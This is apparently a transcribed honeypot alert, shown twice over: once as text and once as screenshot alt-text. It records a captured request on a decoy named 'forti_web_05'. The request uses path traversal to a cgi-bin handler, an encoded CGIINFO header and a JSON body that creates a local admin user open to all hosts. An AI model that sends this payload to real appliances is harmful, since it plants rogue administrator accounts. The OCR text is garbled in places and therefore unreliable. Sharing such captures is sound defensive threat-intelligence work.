POST /api/v2.0/cmdb/system/
admin%3F/../../../../../cgi-bin/fwbcgi
General REST API
2025-11-06 18:04:50
Attack Source Target Decoy Decoy Name
107.152.41.19:60342 [redacted] forti_web_05
No DNS record found
Attack Payload | copy | REDACTED
POST /ap1/v2.0/cndb/systen/adnink3F/ ../.../../. ./../cgi-bin/fubcgl HTTP/1.1
Host: [redacted]
User-Agent: python-url1ib3/2.2.3
Accept-Encoding: identity
CGIINFO: yJ1c2VybnFtZSI6ICINZG1pbISTCINCRINDRFEZS IG ICINCOmX2FKbNLUT ug TnZKb29101A1CRVACTS IC Sb 2dpbmShbUL0IALYWREANAL Fg==
Content-Length: 835
Content-Type: application/json
{"data": {"q_type": 1, "name": "Testpoint", "access-profile’: "prof admin", "access-profile val’: "0", "trusthostva": "0.0.0.0/0
", "trusthostve": "::/@ ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": ",
"hidden": 0, "domains": "root", "sz_dashboard": -1, "type": "local-user”, "type val’: "0", "adnin-usergrp_val": "0",
"wildcard val": "0", "accprofile-override val’: "0%, "sshkey": "¥, "passud-set-tine": 0, "history-password-pos: 0, "history-
password@”: "", "history-passwordi": "*, "history-password2": "*, “history-password3": "*, "history-password4”: "*, “"history-
passwords": "*, "history-password6": "*, "history-password7": "*, "history-password8": "", "history-passwordd": "", "force-
password-change"': "disable", "force-password-change val": "0", "password": "AFodIUU3SSzpS'}}
Raw request shown; binary replaced with “." on decode.
![POST /api/v2.0/cmdb/system/
admin%3F/../../../../../cgi-bin/fwbcgi
General REST API
2025-11-06 18:04:50
Attack Source Target Decoy Decoy Name
107.152.41.19:60342 [redacted] forti_web_05
No DNS record found
Attack Payload | copy | REDACTED
POST /ap1/v2.0/cndb/systen/adnink3F/ ../.../../. ./../cgi-bin/fubcgl HTTP/1.1
Host: [redacted]
User-Agent: python-url1ib3/2.2.3
Accept-Encoding: identity
CGIINFO: yJ1c2VybnFtZSI6ICINZG1pbISTCINCRINDRFEZS IG ICINCOmX2FKbNLUT ug TnZKb29101A1CRVACTS IC Sb 2dpbmShbUL0IALYWREANAL Fg==
Content-Length: 835
Content-Type: application/json
{"data": {"q_type": 1, "name": "Testpoint", "access-profile’: "prof admin", "access-profile val’: "0", "trusthostva": "0.0.0.0/0
", "trusthostve": "::/@ ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": ",
"hidden": 0, "domains": "root", "sz_dashboard": -1, "type": "local-user”, "type val’: "0", "adnin-usergrp_val": "0",
"wildcard val": "0", "accprofile-override val’: "0%, "sshkey": "¥, "passud-set-tine": 0, "history-password-pos: 0, "history-
password@”: "", "history-passwordi": "*, "history-password2": "*, “history-password3": "*, "history-password4”: "*, “"history-
passwords": "*, "history-password6": "*, "history-password7": "*, "history-password8": "", "history-passwordd": "", "force-
password-change"': "disable", "force-password-change val": "0", "password": "AFodIUU3SSzpS'}}
Raw request shown; binary replaced with “." on decode.](https://media.infosec.exchange/infosec.exchange/media_attachments/files/115/508/940/388/991/609/original/d1f81790ca21a7fd.png)
